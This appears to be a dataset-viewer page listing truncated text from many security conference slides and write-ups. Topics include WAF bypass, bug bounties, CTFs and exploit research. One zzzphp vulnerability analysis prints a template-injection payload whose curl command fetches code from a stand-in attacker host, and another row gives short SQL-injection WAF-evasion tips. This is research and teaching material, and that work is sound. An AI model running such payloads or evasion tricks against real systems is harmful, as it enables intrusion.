text
stringlengths
100
9.93M
category
stringclasses
11 values
这今天绕了很多 waf,很多人想看,其实很简单。 只测试了 SQL 注入和文件上传,其他的变化都太小了,比如 SSRF,一般拦的都很死,比如 XXE,UTF-7/UTF-16 试一下就行了。 文件上传的绕过方式,安全客有篇文章已经介绍的非常非常详细了。 https://www.anquanke.com/post/id/241265 SQL 注入的绕过方式呢,你们可以看我写的几个弱点。 先看 WAF 是否完全拦截了/**/,/*!*/,--,%23 这四种注释,一般只会拦截前两个。然后 在注释中塞足够多的脏数据。一部分 WAF 很吃这一招。 然后可以试一试分块传输,一部分 WAF 不拦截这个。 再然后,WAF 主要拦截 ...
pdf
25 Years of Program Analysis Zardus Program Analysis Specification What should hold about the program? Technique How will we achieve the goal? Goal What do we want to achieve regarding the specification? Dawn of Computing 1830s 1842 1842 1947 Manual Program Analysis 1949 Alan Turing. "Checking a large routine." EDS...
pdf
MesaTEE SGX: Redefining AI and Big Data Analysis with Intel SGX Yu Ding Staff Security Scientist, Baidu X-Lab May-29-2019 About me • https://dingelish.com • https://github.com/dingelish • https://github.com/baidu/rust-sgx-sdk • Security Scientist @Baidu X-Lab • Rust Fans • Ph.D on Exploit/Mitigation • Works on Rust-SG...
pdf
Bug Bounty 獎金獵人甘苦談 那些年我回報過的漏洞 orange@chroot.org #Orange Tsai #CHROOT #DEVCORE #電競選手 #CTFer #Web #汪 My RCE Checklists √ Facebook √ Apple √ Yahoo √ Uber ? Google 什麼是 Bug Bounty Program ? • 在官方所提供的規則及範圍下, 讓獨立的研究人員可自由尋找系 統漏洞, 並提供對等的獎勵 小禮物 獎金 名譽(Hall of Fame) Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 How do y...
pdf
Breaking Parser Logic! Take Your Path Normalization Off and Pop 0days Out Orange Tsai Orange Tsai • Security researcher at DEVCORE • Hacks in Taiwan member orange_8361 Agenda 1. Introduce the difficulty 2. In-depthly review existing implementations 3. New multi-layered architecture attack surface Normalize To make stan...
pdf
#BHUSA @BlackHatEvents The Battle Against the Billion-Scale Internet Underground Industry: Advertising Fraud Detection and Defense Zheng Huang | Chief Architect of Security Department, Baidu Shupeng Gao | Senior Security Researcher, Baidu Yakun Zhang | Senior Security Researcher, Baidu Hai Yang | Senior Security Res...
pdf
1 Java注⼊ShellCode踩坑 前⾔ 三种⽅法简介 JNI JNA JVM 踩坑 放弃JNA JVM的坑 正确操作 测试 实现代码 最后 @yzddmr6 @zsxq: websafe 在做As-Exploits的Java Shellcode加载模块的时候遇到了很多的坑,在这⾥跟⼤家分享⼀下。 宽字节的这篇⽂章写的很好,java执⾏shellcode的⼏种⽅法,主要也是根据这篇⽂章来实现的。这⾥简单 总结⼀下 由于Java屏蔽了很多底层的细节,所以没办法直接⽤原⽣Java去注⼊shellcode。但是Java提供了加载 C++动态链接库的⽅法,所以我们可以把加载Shellcode的代码写在dll⾥,然后⽤Java去调⽤dll...
pdf
A FAILURE OF IMAGINATION: Kwikset Smartkey® and Insecurity Engineering ONE OF THE MOST SECURE and INSECURE LOCKS IN AMERICA KWIKSET SMARTKEY #1: IS SMARTKEY SECURE? Brian: 06/25/2013 1105 A.M. #2: IS SMARTKEY SECURE? Satima: 06/24/2013 4:26 P.M. #3: IS SMARTKEY SECURE? Raymond: 06/25/2013 3:58 P.M. KWIKSET LOCKS A Sp...
pdf
Sources of EMR Sources of EMR Human Brain Power Lines (50,60Hz) Induction Heating Cell phone Micro- wave oven Radar Light bulb People Radio tower X-Ray machines Radioac- tive elements Sizes of EMR Sizes of EMR Earth 12,756 km Football Field 100m House 12m Football 308mm People 1.8m Honey Bee 1.2cm Single Cell 10µm Wate...
pdf
Defcon Comedy Jam 2 The FAIL Strikes Back We are: David Mortman aka Arthur Rich Mogull aka Crash Chris Hoff aka FAIL Robert "RSnake" Hansen aka RSnake Larry Pesce aka HaxorTheMatrix David Maynor aka Goat? What Goat?
pdf
#BHUSA @BlackHatEvents eBPF ELFs JMPing Through the Windows Richard Johnson Trellix #BHUSA @BlackHatEvents Information Classification: General Whoami Richard Johnson Senior Principal Security Researcher, Trellix Vulnerability Research & Reverse Engineering Owner, Fuzzing IO Advanced Fuzzing and Crash Analysis Training...
pdf
1 TEMPEST radio station Paz Hameiri https://il.linkedin.com/in/paz-hameiri-251b11143 Abstract TEMPEST is a cyber security term that refers to the use of electromagnetic energy emissions generated by electronic devices to leak data out of a target device. The attacks may be passive (where the attacker receives th...
pdf
Mobile Hacker Spaces Thomas Wilhelm About the Talk • Concept behind Hacker Spaces • (Dis)Advantages of Mobile Hacker Spaces • Real-World Example About the Talker • Thomas Wilhelm –Contributing Author: About the Talker • Thomas Wilhelm – Certifications: ISSMP CISSP SCSECA… – Work: • Fortune 50 Company – Penetration Tes...
pdf
了解完基本流程后,为了更加了解TP框架,还需要了解下数据的传递。主要涉及的类为Db  Query Connection等 我们借助一句原生查询来了解数据库传递的过程,在index Controller中写入这样一句 Db::query("select * from think_user where status=1"); 当我第一次去Db类中看时,没有找到query方法,只找到了一大段注释 这时我们可以下断点来分析 首先我们进入了Db类的__callStatic方法,当一个控制器调用了不存在的方法时,这个魔术 方法就会被调用 里面调用了call_user_func_array方法 可以很明显的看到,第一个参数是一个数组,那么也 就是...
pdf
PDA insecurity Insecurity in a mobile world Bryan Glancey Agenda • PocketPC Overview – Registry – Synchronization – HP 5455 Biometric issue • Palm Overview • General Issues • Conclusion PocketPC • ActiveSync –USB/Serial –BlueTooth –TCP/IP PocketPC Toolkit • Registry Editors – www.pocketpcdn.com/articles/registry.html ...
pdf
1 Your Bank’s Digital Side Door @sdanndev 2 “Because that’s where the money is.” Willie Sutton, Bank Robber 3 Why does my bank website require my 2-factor token, but pulling my transactions into Quicken does not? 4 Personal Financial Management PFM 5 Personal Financial Management (PFM) 7 8 9 10 11 12 13 Quicken/Quic...
pdf
nat smash 0x00 get wendell 0x01 nf_conntrack_ftp nf_conntrack_ftp ftp 1. ESTABLISHED 2. 3. TCP PAYLOAD 4. PORTEPRT 5. 6. 21 1. ESTABLISHED 2. tcp payload\n 3. 4. 21 \n helpfind_pattern seq\nseqseq flagfind_pattern seqmsstcp payloadseq tcp seqseq1lenpayloadack nf_contrack_ftpseqlen(payload)seq1len payloadseq 0x03...
pdf
Asymmetric Defense Asymmetric Defense How to Fight Off the NSA Red Team with Five People or Less Efstratios L. Gavas Department of Marine Transportation United States Merchant Marine Academy DEFCON 17 Asymmetric Defense Outline Introduction What is the Point? About the USMMA About the CDX Network Design Overview of Net...
pdf
Dark Data Svea Eckert – Andreas Dewes Who we are Svea Eckert Journalist NDR/ ARD @sveckert @japh44 Andreas Dewes (data) scientist Why we are here “US Senate voted to eliminate broadband privacy rules that would have required ISPs to get consumers' explicit consent before selling or sharing Web browsing data (...)“ 3...
pdf
副本 Apache Solr 组件安全概览 ⼀、组件概述 1.关键词 企业级全⽂检索服务器、基于Lucene 2.⼀些名词 (1) 数据 结构化数据,与非结构化数据 结构化数据: 用表、字段表示的数据 数据库适合结构化数据的精确查询 半结构化数据: xml 、html 非结构化数据: 文本、文档、图片、音频、视频等 (2) Document 被索引的对象,索引、搜索的基本单元,⼀个Document由多个字段Field构成 Field 字段名name 字段值value 字段类型type FieldType(这个fieldtype也有很多属性主要两个是name 以及 class ⽤来存放该 类型值的类名),Field中包含分析...
pdf
Laboratory for Dependable Distributed Systems • RWTH Aachen University NoSEBrEaK - Defeating Honeynets Maximillian Dornseif, Thorsten Holz, Christian N. Klein at Laboratory for Dependable Distributed Systems • RWTH Aachen University Who and Why Laboratory for Dependable Distributed Systems • RWTH Aachen University Ho...
pdf
WHITE PAPER © 2015 IOActive, Inc. All Rights Reserved Abusing XSLT for Practical Attacks White Paper Fernando Arnaboldi IOActive Senior Security Consultant Abstract Over the years, XML has been a rich target for attackers due to flaws in its design as well as implementations. It is a tempting target because it ...
pdf
2022/9/14 上午1:41 开发shiro蜜罐遇到的⼀些问题 - depy https://rce.ink/index/view/406.go 1/9 depy It is a long and beautiful life. 首页 关于 友链 开发shiro蜜罐遇到的一些问题 2022年09月14日 / 网络安全 前情概要 我曾经写过一篇文章是帮助freebuf实现php网站拥有shiro的:https://rce.ink/i ndex/view/366.go 之前的蜜罐一直写到可以根据指定key让工具实现逼真的爆破效果,如图所示: ^ 2022/9/14 上午1:41 开发shiro蜜罐遇到的⼀些问题 - depy h...
pdf
HCTF2016-Writeup --by Nu1L 目 录 HCTF2016-Writeup.....................................................................................................1 Level1............................................................................................................................2 1. Reverse-Web...........................
pdf
©2016 Check Point Software Technologies Ltd. PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD TRICKS About Me • Yannay Livneh • Security Researcher @ CheckPoint • Play w/ – Networks – Embedded – Linux – Memory Corruptions – and stuff . AGENDA ...
pdf
RealWorld CTF WriteUp By Nu1L RealWorld CTF WriteUp By Nu1L Pwn QLaaS Who Moved My Block SVME Crypto Treasure Hunter WEB RWDN Hack into Skynet Pwn QLaaS 可以修改/proc/self/mem #include <sys/types.h> #include <dirent.h> #include <sys/types.h> #include<stdio.h> #include<fcntl.h> #include<unistd.h> typedef unsigned lon...
pdf
POC分析: 分析POC可得到以下信息: 1. 漏洞点由Cookie触发,Cookie值为 keys 2. Payload像是一个if标签,猜测可能为模板注入 3. 请求参数为 ?location=search,猜测可能是个路由 漏洞分析 复现环境为:zzzphp v2.0.3 从 /index.php 找起,跟踪到 inc/zzz_client.php 。搜索 location 关键字。接着找到这么一段代 码: 查看模板文件 /template/pc/cn2016/html/search.html 。发现了Poc中的 keys curl -b 'keys={if:=`curl http://attacker.tld/poc.s...
pdf
EDS: Exploitation Detection System By Amr Thabet Q-CERT About The Author v Amr Thabet (@Amr_Thabet) v Malware Researcher at Q-CERT v The Author of: §  Security Research and Development Framework (SRDF) §  Pokas x86 Emulator v Wrote a Malware Analysis Paper for Stuxnet Company Logo Introduction v N...
pdf
It’s assembler, Jim, but not as we know it! Morgan Gangwere DEF CON 26 Dedication Never forget the shoulders you stand on. Thanks, Dad whoami Hoopy Frood Been fiddling with Linux SOCs since I fiddled with an old TS-7200 EmbeddedARM board I’ve used ARM for a lot of services: IRC, web hosting, etc. I’ve built Cyano...
pdf
1 . 1 One Gadget RCE david942j @ HITCON CMT 2017 2 . 1 Before Start 2 . 2 Q: 1. 2. 3. 2 . 3 3 . 1 Who Am I david942j CTF 4 . 1 Introduction 4 . 2 Hacker 4 . 3 4 . 4 Binary Services (PE / ELF) PE - Windows ELF - Linux Web Browser OS Kernel (privilege escalation) VM (VM escape) CTF 4 . 5 Binary Exploitation in CTF ...
pdf
Nir Valtman, CISSP Blog: www.valtman.org Twitter: @ValtmaNir Bug Bounty Programs Evolution 2 I’m an architect Zombies!!! 5 Defacement 6 AntiDef OPEN SOURCE Memory Scraper Secure TDD Research Bug Bounty Programs Since 2011 Academy Final Project If you can’t beat them, join them! Not cost-effective Virtual Environme...
pdf
EXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT By Noam Moshe and Sharon Brizinov of Claroty Team82, and Raul Onitza-Klugman and Kirill Efimov of Snyk claroty.com 2 Copyright © 2021 Claroty Ltd. All rights reserved 03 Introduction 03 Recent Example: Log4j allowedLdapHost bypass 03 Findings 06 URLs and ...
pdf
访问地址直接给出了源码: http://101.32.205.189 <?php class ip { public $ip; public function waf($info){ } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR']); }else{ $this->ip =$_SERV...
pdf
IDA Pro Hex-Rays Decompiler Simple Tricks Hello! aaaddress1(ADR) 1. Reverse Engineering Skills a. Windows b. Android 2. TDoHacker Core Member 3. Hack Bot a. CrackShield / MapleHack b. Tower Of Savior c. Facebook 4. CSharp,C/C++,Assembly x86 Python,Smali,Pascal,VB.NET Outline ➢ 動機 ➢ IDA Pro Hex-Rays Decompiler是什麼 ➢ 如何理...
pdf
Submitted to DefCon16 Autoimmunity Disorder in Wireless LANs By Md Sohail Ahmad J V R Murthy, Amit Vartak AirTight Networks Submitted to DefCon16 Disclaimer & About Us We are no medical doctors – our only competency is coffee drinking. The last year we brought to you ‘Café Latte with free topping of cracked WEP’....
pdf
O P E N S O U R C E FA I R Y D U S T JOHN MENERICK S E C U R I T Y D R A G O N @ N E T S U I T E T H E V I E W S A N D O P I N I O N S E X P R E S S E D H E R E A R E M Y O W N O N LY A N D I N N O WAY R E P R E S E N T T H E V I E W S , P O S I T I O N S O R O P I N I O N S - E X P R E S ...
pdf
Using GPS Spoofing to Control Time Dave/Karit (@nzkarit) – ZX Security Defcon 2017 www.zxsecurity.co.nz @nzkarit Dave, Karit, @nzkarit Security Consultant at ZX Security in Wellington, NZ Enjoy radio stuff Pick Locks and other physical stuff at Locksport whoami 2 www.zxsecurity.co.nz @nzkarit 3 www.zxsecurity.co.nz @...
pdf
1 记次审计时遇到的加密分区解密 前⾔ ⽂件系统分析 ⽂件系统解密 最近拿到了⼀个商业产品的qcow2 镜像 准备试⼀试代码审计 ⾸先⽤qemu-img 转换成vmdk 镜像 转换遇到错误 ⽹上搜索只有⼀个其他项⽬的issue 没有解决⽅案 阅读qemu源代码 发现是在2017-02-15版本引⼊了这个特性 https://lists.gnu.org/archive/html/qemu-devel/2017-02/msg03173.html 发现可以使⽤2016年的旧版qemu完成转换 https://qemu.weilnetz.de/w64/2016/ 转换完成使⽤vm启动 准备进⼊grub修改root密码 发...
pdf
PLEAD The  Phantom of  routers Who  we  are •  Charles  &  Zha0 •  APT  Research  @  Team  T5 •  Malware  analysis,  Cyber  Threat  Tracking Agenda •  IntroducGon •  PLEAD  began •  PLEAD  malware  analysis •  PLEAD  lateral  movement •  GD  Rat:  Hiding  behind ...
pdf
BeaconEye的技术原理 0x00 前言 刚开始,群里小伙伴讨论BeaconEye的时候,我不以为然,无外乎就是内存扫描嘛,对抗手法一大堆, 分分钟给他搞搞失效。 最后呢,在我仔细研究之后,以后再也不敢装逼了。 0x01 前置知识 由于我二进制也是个菜逼,搞清楚BeaconEye需要掌握一些前置知识: windows内存管理API 通过这个图我们知道,我们经常使用malloc等c库函数实际操作的是堆内存,而堆内存来源于虚拟内存。 这儿重点就在于堆内存的管理。在windows种堆内存是共享资源,是被所有线程共享的资源,因此不管 是主线程还是子线程,使用malloc等函数分配的内存都是在堆内存里面划出的一块儿区域,这个区域还 能被多...
pdf
Aug 2017 Senior Malware Scientist ,Trend Micro spark@trendmicro.com HITCON Source: https://ransomwaretracker.abuse.ch/tracker/cerber/ booster[0]: 0:[f1<127.5] yes=1,no=2,missing=1 1:[f7<28.5] yes=3,no=4,missing=3 3:[f5<30.95] yes=7,no=8,missing=7 7:[f0<5.5] yes=15,no=16,missing=15 15:leaf=-1.89091 16:leaf=-0.5 8:[f6<0....
pdf
Hack Mobile Games For Fun HITCON 2015 ChienWei Hung (winest) 2 四年前被騙入趨勢當研替 遊戲資歷22年 • 永遠的β測試玩家 你哪位? 3 四年前被騙入趨勢當研替至今 遊戲資歷22年 • 永遠的β測試玩家 4 來聊聊手機遊戲破解 5 2014年營收 6 Rank 1 2 3 4 5 6 7 8 9 10 from App Annie Rank 10 9 8 7 6 5 4 3 2 1 iOS App Store Taiwan Russia France Germany Canada Australia United Kingdom China Japan Unit...
pdf
Approved for Public Release, Distribution Unlimited 1 Approved for Public Release, Distribution Unlimited 2 Approved for Public Release, Distribution Unlimited 3 Approved for Public Release, Distribution Unlimited 4 Approved for Public Release, Distribution Unlimited 5 Approved for Public Release, Distribution Unlimite...
pdf
CTF培训—PWN(漏洞挖掘与利用) 报告人: 360政企安服-胡晓梦 时间:2019年9月X日 CONTENT 团队介绍和自我介绍 1 PWN介绍 2 PWN基础入门 3 PWN实例讲解与演示 4 PWN解题总结 5 团队介绍和自我介绍 第一部分 团队介绍&自我介绍 待完善优化 讲在前面的话 师傅领进门,修行在个人。 虽然大部分培训只是入门的引领,但这里我们传授的是核心知识体系! PWN介绍 第二部分 CTF-PWN介绍 Ø 什么是PWN? PWN 题目主要考察二进制漏洞的挖掘和利用,需要对计算机操作系统底层有一 定的了解。在 CTF 竞赛中,PWN 题目主要出现在 Linux 平台上。 Ø PWN题目形式? • 一个ip地址和端...
pdf
DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Fighting Fighting malware malware on your own on your own Vitaliy Kamlyuk Senior Virus Analyst Kaspersky Lab Vitaly.Kamluk@kaspersky.com DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Why fight malware on your own? Why fight malware on your own? 5 reasons: 1. Touch 10...
pdf
Separating Bots from Humans Ryan Mitchell @kludgist DEF CON 23 August 8th, 2015 Who am I? ● Software Engineer ● Author of two books: ○ Web Scraping with Python (O’Reilly, 2015) ○ Instant Web Scraping with Java (Packt, 2013) ● Engineering grad from Olin College ● Masters student at Harvard University School of Extensi...
pdf
2015.11 by phithon 被Git打破的 企業安全大門 Who am I • phith0n • 乌云核⼼心⽩白帽⼦子/XDSEC成员 • 从事Web安全/运维安全研究 What is GIT 刪除 增加 增加 phithon@fake-demo:~$ git add . phithon@fake-demo:~$ git commit Finish Git是⼀一个分布式版本控制软件 在开发中运⽤用git可以⽅方便地进⾏行团队协作、敏捷开发 GIT与信息安全 • Github造成的企业敏感信息泄露 • web⺫⽬目录/.git/访问造成的源码泄露 • 内⺴⽹网Git未授权访问造成敏感信息泄露 • Github造成...
pdf
An Introduction to Backdooring Operating Systems Lance Buttars Aka Nemus DC801 www.dc801.org www.introtobackdoors.com - Updated Slides Special Thanks to Natedmac , Metacortex, Grifter, D3c4f and everyone at DC801 Disclaimer • The information provided in this presentation is to be used for educational purposes only...
pdf
Trust Transience:  Post Intrusion SSH Hijacking July 2k5 ­ Blackhat USA 05 & Defcon 0x0D So you're a sneaky Blackhat... The Target Recon ● Mail headers say MUA  is PINE ● .sig says Debian Sarge,  kernel 2.4.22 ● Web logs suggest egress  HTTPS traffic doesn't go  via a proxy (source  address is their NAT  router, not HT...
pdf
PowerPreter: Post Exploitation like a boss Nikhil Mittal Get-Host • Hacker who goes by the handle SamratAshok • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.blogspot.com • Creator of Kautilya and Nishang • Interested in Offensive Information Security, new attack vectors and methodologies to...
pdf
Breaking Bluetooth By Being Bored JP Dunning DefCon 2010 © Shadow Cave LLC JP Dunning Graduate Student: Computer Science, Virginia Tech Research Focus: Wireless and Portable Security Website: www.hackfromacave.com © Shadow Cave LLC © Shadow Cave LLC Bluetooth ● IEEE 802.15.1 ● Low Power / Short Range ● Ad-Hoc (Picone...
pdf
Defcon Comedy Jam 3 3D Or Not 3D? We are: David Mortman aka Arthur Rich Mogull aka Crash Chris Hoff aka Hoff Larry Pesce aka HaxorTheMatrix David Maynor aka No Pie But Apple Pie
pdf
Starting the Avalanche: Application DoS In Microservice Architectures Scott Behrens Jeremy Heffner Jeremy Heffner ● Senior Security Software Engineer ● Developing and securing things for 20+ years Introductions Scott Behrens ● Netflix senior application security engineer ● Breaking and building for 8+ years ● Cont...
pdf
No Key? No PIN? No Combo? No Problem! P0wning ATMs For Fun and Profit Roy Davis roydavis@roydavis.org @hack_all_things /in/roy-davis Why ATMs? https://www.youtube.com/watch?v=ZO956U10Zlc https://www.statista.com/statistics/741708/number-of-atms-worldwide/ https://bit.ly/3ySNvey Better World Through Hacking Barnaby...
pdf
微信⼩程序开发总结 - 1 微信⼩程序开发总结 背景是⼩程序《⽺了个⽺》⼤⽕,依靠⼴告就能被动赚钱。⽬前各⼤头部⼚商阿⾥、百 度、头条也都推出了⾃⼰的⼩程序。 它们之间应该都⼤同⼩异,所以我也花⼀个星期研究了下⼩程序开发,做了⼀个微信⼩ 程序 《画⼏个画》。这篇是⼩程序开发总结,开发过程中有些坑还是要记录⼀下的,最 后也说⼀下我的⼩程序的总结。 开发 有个 uni-app,说是⼀套代码可以编译到 14 个平台。说明⼩程序间的规则都⼤同⼩ 异。我还是选择按照微信官⽅的⽂档开发。 官⽅⽂档: ⼩程序的主要开发语⾔是 JavaScript,类似 vue 和 react 的写法,之前有过前端的开发 经历,学起来也⽐较块。 开发者⼯具 第⼀步...
pdf
浅谈Fastjson绕waf 写在前⾯ 关键时期换个⼜味,虽然是炒陈饭,但个⼈认为有⼲货的慢慢看,从最简单到⼀些个⼈认 为⽐较骚的,本⼈垃圾代码狗,没有实战经验,因⽽更多是从fastjson的词法解析部分构造混 淆 初级篇 添加空⽩字符 在 com.alibaba.fastjson.parser.JSONLexerBase#skipWhitespace public final void skipWhitespace() {        while(true) {            while(true) {                if (this.ch <= '/') {                   ...
pdf
MacOS Big)Sur内核漏洞挖掘和利用 Bio 0 1 Twitter(@peterpan980927) 阿里安全潘多拉实验室 高级安全工程师 iOS/macOS 安全研究&开发 KCon 2019 PPT 放映员&乐透操作手 Agenda 0 2 1. Backgrounds 2. Some case studies 3. Mitigations overview & new features 4. Attack macOS Big Sur 5. Summary & Credit Backgrounds AppleOS Kernel 0 3 XNU: X is not Unix(Hybrid Kernel) 1. Mach-...
pdf
我是如R挖各SRC漏洞的 目 录 一、S为外行对信息安全的理解和看法 二、为什么会喜欢挖漏洞 三、对此事定位、布局 四、了解游戏规则 C、了解自己想做的和能做的 目 录 六、情报收集,从远处看细节 七、选择容易忽视的问题,避开高手 八、了解(开发、实施、安全  人员的细微关系和情绪 九、一个有意思的漏洞 p、一个有意义的漏洞 一、S为外行对信息安全的理解和看法 由于之前不知道什么是信息安全,一开始的想法 就是:信息安全=黑客 ,然后就是下面这样的。 二、为什么喜欢挖漏洞 如果说追女朋友是h(m太旺盛,那么挖漏洞可 能就是因为女朋友不在家。。。 ...
pdf
intigriti-0422-XSS-Challenge-Write-up 1 intigriti-0422-XSS-Challenge- Write-up 前⾔ intigriti新出的challenge,猜到是原型链污染的题,但是许多点(因为菜)没有反应过 来,同时学到了⼀点新知识,应各位师傅要求分享⼀下。 不了解JavaScript原型链污染攻击的,可以先去P师傅博客预习⼀下。 https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html 原题地址 https://challenge-0422.intigriti.io/ 解题...
pdf
Presenter Tony Flick Principal, FYRM Associates Over 6 Years in Information Assurance Many DEFCONs / First presentation Agenda What is the smart grid? What makes up the smart grid? Known problems Security initiatives Timeline History repeating Recommendations What is the Smart Grid? Current infrastructure Future infras...
pdf
Robot Shark Laser! What Hackerspaces do What is a Hackerspace? • Physical Forum • Collaborative Projects • Community: Friends, Hackers, Countrygeeks! • DIY exchange skills, info • See: CCC, Makezine, DIY, dorkbot, HackLab Panel Introduction Noid The Black Lodge Seattle, WA. US Leigh Honeywell Hacklab.TO Toronto, Canad...
pdf
S-SDL企业应用实践 关于漏洞、风险、成本 1. 为什么软件总会有漏洞?漏洞是怎么引入的? ◦ 业务需求引入 ◦ 产品设计引入 ◦ 编码引入 2. 如何应对风险 ◦ 缓解风险 ◦ 转移风险 ◦ 接受风险 3. 安全成本 ◦ 对于企业来说,安全投入多少是合适的? 什么是S-SDL 不是一种安全技术,而是E2E的安全工程能力 也是一种Security Built In的解决方案 目标:交付更安全的系统 S-SDL架构 安全策略/安全治理 组 织 架 构 培 训 体 系 研 发 流 程 度 量 体 系 工 具 平 台 安全标准、规范、过程、知识库 人 工具 方法 质量 管理 安全是质量属性的一部分,将安全融入到质量管理是构建S-SDL的...
pdf
KNOCK? KNOCK? WHOIS THERE? APT ATTRIBUTION AND DNS PROFILING Frankie Li ranerwang@gmail.com Twitter: @espionageware •  APT Attribution: Who wrote these codes? •  Tactics, Techniques and Procedures (TTP) •  Behavior of APT adversary •  HUMINT extracted from DNS •  Gather intelligence from open source (aka OSINT...
pdf
绿盟科技 NSFOCUS WASM双刃剑—机制剖析与逆向 演讲人:赵光远 2 0 1 8 PART 01 WASM 目录 CONTENTS PART 02 Compile PART 03 挖矿实例 PART 04 探索方向 01 02 03 04 PART 01 WASM • 前端编程无法解决的问题 • 传统的js脚本运行缓慢 • 在浏览器中无法实现复杂功能(效率不足,影响体验) • 很低的渲染能力,却拥有CPU、GPU极高的占用率 • 应用场景 • 浏览器页面3D环境渲染 • 数据压缩 • 图像/音频/视频的处理 • 挖矿(本身就是计算的一种) • …. • 支持度 • WebAssembly(WASM) • 基于栈的二进制格式...
pdf
1 They’re Hacking Our Clients! Introducing Free Client-side Intrusion Prevention Jay Beale Creator - Bastille UNIX Co-Founder - Intelguardians, Inc. Copyright 2008 Jay Beale Intelguardians, Inc 2 Copyright 2008 Jay Beale Intelguardians, Inc. Penetration Testing I work for Intelguardians, a security consulting firm. I...
pdf
读读 fingerprintx ,⼀个端⼝指纹识别⼯具 GitHub:https://github.com/praetorian-inc/fingerprintx fingerprintx是⼀个类似于httpx的实⽤程序,它还⽀持 RDP、SSH、MySQL、PostgreSQL、Kafka 等指纹识 别服务。fingerprintx可以与Naabu等端⼝扫描仪⼀起使⽤,对端⼝扫描期间识别的⼀组端⼝进⾏指纹识别。 例如,⼯程师可能希望扫描 IP 范围,然后快速识别在所有发现的端⼝上运⾏的服务。 输⼊ip+端⼝,就能输出端⼝服务指纹相关的信息 ⽀持的协议: SERVICE TRANSPORT SERVICE TRANSPORT HTT...
pdf
Outsmarting the Smart City DISCOVERING AND ATTACKING THE TECHNOLOGY THAT RUNS MODERN CITIES & 2 Page Researcher Bios • Daniel Crowley (@dan_crowley) • Research Baron at IBM X-Force Red • Pen tester since 2004 • Locksport enthusiast and past competition winner • Actually holds the title of Baron (in Sealand) 3 Page Res...
pdf
SCADA & PLCs in Correctional Facilities: The Nightmare Before Christmas John Strauchs Tiffany Rad Teague Newman Defcon 19   Analyze SCADA systems and PLC vulnerabilities in correctional and government secured facilities   Discuss modern prison design   Theorize possible attack vectors and routes of ma...
pdf
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Getting the goods with smbexec Eric Milam – Brav0hax Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Righ...
pdf
CANSPY: a Platform for Auditing CAN Devices Arnaud Lebrun Airbus Defence and Space arnaud.lebrun@airbus.com Jonathan-Christofer Demay Airbus Defence and Space jcdemay@airbus.com ABSTRACT In the past few years, several tools have been released allowing hobbyists to connect to CAN buses found in cars. This is wel...
pdf
● ● ● ● 😮 😉 😊 💥 System.Web.UI.Control.OpenFile System.Web.UI.WebControls.MailDefinition.CreateMailMessage System.Web.UI.WebControls.LoginUtil.CreateMailMessage System.Web.UI.WebControls.LoginUtil.SendPasswordMail ✗ ChangePassword.PerformSuccessAction ✗ CreateUserWizard.AttemptCreateUser ✓ PasswordRecovery.AttemptSe...
pdf
The Growth of Global Election Disinformation: The Role and Methodology of Government-linked Cyber Actors Sandra Quincoses Intelligence Analyst - Nisos About Dr. Sandra Quincoses Current: ● Senior Intelligence Analyst at Nisos ● Adjunct professor at Florida International University (FIU)- Intelligence Fellowship Pro...
pdf
JTAGulator JTAGulator Bill-of-Materials Bill-of-Materials Bill-of-Materials HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 Build Quantity Build Quantity 1 Item Quantity Reference Manufacturer Manuf. Part # Distributor Distrib. Part # Description Unit Price Per B...
pdf
駭客如何弄垮企業? 從索尼影業與南韓核電廠事件說起 gasgas@chroot.org ziv_chang@trendmicro.com 2015.01.09  HITCON  Freetalk 索尼影業被害事件 •  iThome  2014  12  05  報導 •  索尼影業(Sony  Pictures)在上周⼀一(11/24)遭到駭客⼊入侵,導致內部 網路及電腦全數停擺,除影⽚片及員⼯工資料外流,並傳出內部電腦資料 全數遭刪除。介⼊入調查的FBI隨後緊急警告美國業者應留意⼀一款可執⾏行 毀滅性網路攻擊的惡意程式,資安業者對該惡意程式研究發現,駭客 在正式展開攻擊的48⼩小時前才編...
pdf
pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle Brad Dixon - Carve Systems DEF CON 24 • It works • Easy • Teachable • Dramatic “USEFUL NOVELTY” • Risky • Crude • Perhaps redundant Demo Prior Art • Significant body of work around fault injection and glitching at the IC level for secure process...
pdf
The Making Of Second SQL Injection Worm (Oracle Edition) Sumit Siddharth SID@notsosecure.com www.notsosecure.com Defcon 17 Las Vegas –2009 2 Defcon 17, Las Vegas, July 2009 About Me: Senior IT Security Consultant More than 4 years of Penetration Testing Not an Oracle Geek :( My Blog: www.notsosecure.com 10 s...
pdf
State Interoperable Communications: DHS Funded Activities Fiscal Years 2003 - 2005 May 2006 Office of Grants and Training Preparedness Directorate U.S. Department of Homeland Security ii State Interoperable Communications: DHS Funded Activities May 2006 Table of Contents May 2006 State Interoperable Communi...
pdf
写了好久的文章,放出来吧 前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、 session替换pagecontext来解决 HttpSession session = lastRequest.getSession(); pageContext.put("request", lastRequest); pageContext.put("response", lastResponse); pageContext.put("session", session); 能这么写的原因是因为冰蝎做了处理 会从传入的obj中分别取到request、response、ses...
pdf
Radio Exploitation 101 Characterizing, Contextualizing, and Applying Wireless Attack Methods Matt Knight Bastille Networks San Francisco, CA matt@bastille.net Marc Newlin Bastille Networks Atlanta, GA marc@bastille.net Abstract—Reverse engineering wireless physical layers has never been easier, thanks to the commoditiz...
pdf
TCP/IP Fundamentals for Microsoft Windows Microsoft Corporation Published: May 21, 2006 Updated: Jan 9, 2012 Author: Joseph Davies Editor: Anne Taussig Abstract This online book is a structured, introductory approach to the basic concepts and principles of the Transmission Control Protocol/Internet Protocol (TC...
pdf
